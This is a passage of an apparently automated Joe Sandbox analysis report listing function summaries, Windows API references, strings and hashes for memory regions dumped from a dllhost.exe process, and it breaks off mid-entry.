Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 06e670e532f30fe7ad91f001f83f8bc83a3716b482001c52586b6247424c1478
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: DB619D7250ABC4C9EB208F25E4457AEB7A0F785BA8F054215EF9C23B99DB78C1D0CB00

Function 00000279A92AAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000279A92AAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000279A92AABBC

Strings

csm, xrefs: 00000279A92AAAF6
csm, xrefs: 00000279A92AAC0E

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 222beb753db21134563c9ce8c42b0e777e0472e318e3e0708414b6b295ba4ad0
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 7C51593720A7808FEB748F26954835877A6FB64BA4F164116DE9D47F95CB38C8D0CB01

Function 00000279A92AA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000279A92AA75B
_CallSETranslator.LIBVCRUNTIME ref: 00000279A92AA7A7

Strings

MOC, xrefs: 00000279A92AA76F
RCC, xrefs: 00000279A92AA777

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 02da3923c6e7bfce1e1af57438eaf8e3685984627ab912723c4dd5498e50d908
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: DE618A7350ABC48AEB218F16E44479AB7A0FB85BA8F054215EF9D17B99DB78C1D4CB00

Function 00000279A9273950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000279A9273972
StrStrW.SHLWAPI ref: 00000279A9273990
StrToIntW.SHLWAPI ref: 00000279A92739B7

Part of subcall function 00000279A9271A30: OpenProcess.KERNEL32 ref: 00000279A9271A56
Part of subcall function 00000279A9271A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000279A9271A74
Part of subcall function 00000279A9271A30: PathFindFileNameW.SHLWAPI ref: 00000279A9271A83
Part of subcall function 00000279A9271A30: lstrlenW.KERNEL32 ref: 00000279A9271A8F
Part of subcall function 00000279A9271A30: StrCpyW.SHLWAPI ref: 00000279A9271AA2
Part of subcall function 00000279A9271A30: CloseHandle.KERNEL32 ref: 00000279A9271AB0

Part of subcall function 00000279A9273F88: StrCmpNIW.SHLWAPI(?,?,?,00000279A927272F), ref: 00000279A9273FA0

Strings

pid_, xrefs: 00000279A9273968

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 995058eb15705748f7afdfcd5a2e9ffb1d2b47039ebbe6b460fd3a7529799025
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: E611E62131A78195FB209B35F84939A63A4FB887A0F824035AE4DF36D5FF39C885C700

Function 00000279A92A3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000279A92A3972
StrStrW.SHLWAPI ref: 00000279A92A3990
StrToIntW.SHLWAPI ref: 00000279A92A39B7

Part of subcall function 00000279A92A1A30: OpenProcess.KERNEL32 ref: 00000279A92A1A56
Part of subcall function 00000279A92A1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000279A92A1A74
Part of subcall function 00000279A92A1A30: PathFindFileNameW.SHLWAPI ref: 00000279A92A1A83
Part of subcall function 00000279A92A1A30: lstrlenW.KERNEL32 ref: 00000279A92A1A8F
Part of subcall function 00000279A92A1A30: StrCpyW.SHLWAPI ref: 00000279A92A1AA2
Part of subcall function 00000279A92A1A30: CloseHandle.KERNEL32 ref: 00000279A92A1AB0

Part of subcall function 00000279A92A3F88: StrCmpNIW.SHLWAPI(?,?,?,00000279A92A272F), ref: 00000279A92A3FA0

Strings

pid_, xrefs: 00000279A92A3968

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: b2d68acdf53505bbdc7da28a85750bcbb1ac9de27ca90ddaa4912cde66202901
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 4B11D32231A79196FB209B25E84D35A63A4F7887A0F8240319E4EC3B96EF39C885C700

Function 00000279A9281FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000279A9282027
WriteFile.KERNEL32 ref: 00000279A9282304
WriteFile.KERNEL32 ref: 00000279A928234A
GetLastError.KERNEL32 ref: 00000279A9282409

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 2af90100dd6de451e7c2e76626d9debf4f77181eda58217de52151396977511f
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 66D1DF3271AB948DE711CFA5D4486DC37B1F364BE8F418216DE5EA7B99DA34C18AC340

Function 00000279A92B1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000279A92B2027
WriteFile.KERNEL32 ref: 00000279A92B2304
WriteFile.KERNEL32 ref: 00000279A92B234A
GetLastError.KERNEL32 ref: 00000279A92B2409

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: f00fb853e8f828f0a0b94449190da49b7f639791d49fe1cdc8f970d47dadf1ad
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: CDD1E03271AB848DE711CFA5D4487DC3BB1F365BA8F464216CE5EA7B99DA34C18AC340

Function 00000279A92714A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A92714C6
HeapFree.KERNEL32 ref: 00000279A92714D5
GetProcessHeap.KERNEL32 ref: 00000279A92714E2
HeapFree.KERNEL32 ref: 00000279A92714F1
GetProcessHeap.KERNEL32 ref: 00000279A9271501

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: eb91298f0844cba6d47964c804b31a37dedf7010821e5d11d5817eed31deb4e1
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 3801883661AB80DEE714DF66E80864977A0F788F90F4A8025DF4D53728EF38D091C740

Function 00000279A92A14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A92A14C6
HeapFree.KERNEL32 ref: 00000279A92A14D5
GetProcessHeap.KERNEL32 ref: 00000279A92A14E2
HeapFree.KERNEL32 ref: 00000279A92A14F1
GetProcessHeap.KERNEL32 ref: 00000279A92A1501

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 601f73c1f7bfd714ad61f41db4d6ef9be829acc90dce26f4616785bc4875f19b
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: BB01653662AB80DAE714DF66E80864977E4F788FA0B0A4025DF4E47B28DF38D092C740

Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400014B2
HeapFree.KERNEL32 ref: 00000001400014C1
GetProcessHeap.KERNEL32 ref: 00000001400014CE
HeapFree.KERNEL32 ref: 00000001400014DD
GetProcessHeap.KERNEL32 ref: 00000001400014ED

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744

Function 00000279A92828F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000279A92828DF), ref: 00000279A9282A12

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 9bf9b91e7fd74c363c5352579e96ae4d8e85a1fed9cc369fd7c9a4f8862c6d3e
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 0E91EF3261A7519DFB608F6594983AD3BA0F768BE8F568116DE4E63B85DB34C4C6C300

Function 00000279A92B28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000279A92B28DF), ref: 00000279A92B2A12

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: a8a9a555139851c89c710fbbb681e278028ba85b2748614109280be0a71c0be8
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: AD91D03261A7508DFB609F65989C7AD3BE0F368BA8F564116DE4F67A85DB34C4C6C300

Function 00000279A9278090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000279A92780BC
GetCurrentThreadId.KERNEL32 ref: 00000279A92780CA
GetCurrentProcessId.KERNEL32 ref: 00000279A92780D6
QueryPerformanceCounter.KERNEL32 ref: 00000279A92780E6

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: d3181fef0d0cd5f21aefe899bda2cb7842efd0cf40178a01e55efd2fdaa4f902
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: B2115E26716F048EEB00CFA4E8583A933A4F719768F450E21DE6D867A4EF78C1A4C340

Function 00000279A92A8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000279A92A80BC
GetCurrentThreadId.KERNEL32 ref: 00000279A92A80CA
GetCurrentProcessId.KERNEL32 ref: 00000279A92A80D6
QueryPerformanceCounter.KERNEL32 ref: 00000279A92A80E6

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: fd429c5f807c8de5c839ed2e1630412f0ed6e0d7b88a26906a717878dcfa7419
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 5E110C26756F048EEF00CF60E8593A933A4F759768F451E25DE6D867A4DF78C1948340

Function 00000279A92727E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000279A92728CC
StrCpyW.SHLWAPI ref: 00000279A92728E5

Part of subcall function 00000279A9273F88: StrCmpNIW.SHLWAPI(?,?,?,00000279A927272F), ref: 00000279A9273FA0

Strings

\\.\pipe\, xrefs: 00000279A92728D7

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 035b562e233aa759943cf278604ed79818b811227b26b073b90623da50a005c4
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: DA71E436219B828AE774DF2A99483FA6794F385BE4F560026DD4D73F89DE34C680C740

Function 00000279A92A27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000279A92A28CC
StrCpyW.SHLWAPI ref: 00000279A92A28E5

Part of subcall function 00000279A92A3F88: StrCmpNIW.SHLWAPI(?,?,?,00000279A92A272F), ref: 00000279A92A3FA0

Strings

\\.\pipe\, xrefs: 00000279A92A28D7

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 5dce73a89741d877e67987f317cea42e812193cb17133b0bec1210d0f9f9a3a8
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: F371D737219B8249E774DF26999C3EA6794F385BE4F560016DD0E53F89DE34CA80C740

Function 00000279A92480A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000279A92480CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000279A9248162

Strings

csm, xrefs: 00000279A9248149

Memory Dump Source

Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 4f14442ffbddefea8021bd7d1f5886bf31ebb2b40bacc41b4783080624a617f6
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: CA517F3232BB408EEB54CF19E448B697791F794BA8F168525DE6E4B78CDB79C881C700

Function 00000279A9249AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000279A9249BA7

Strings

MOC, xrefs: 00000279A9249B6F
RCC, xrefs: 00000279A9249B77

Memory Dump Source

Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: cd14a9a2cc01589e76b2a960366dcf6dc740fdef59b757029546620e3f38c428
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 5E618C36509BC48AEB719F15E44479AB7A0F7C9BA8F058215EF9C07B99CB78C1D0CB00

Function 00000279A92725DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000279A92726C2
StrCpyW.SHLWAPI ref: 00000279A92726D9

Strings

\\.\pipe\, xrefs: 00000279A92726CD

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
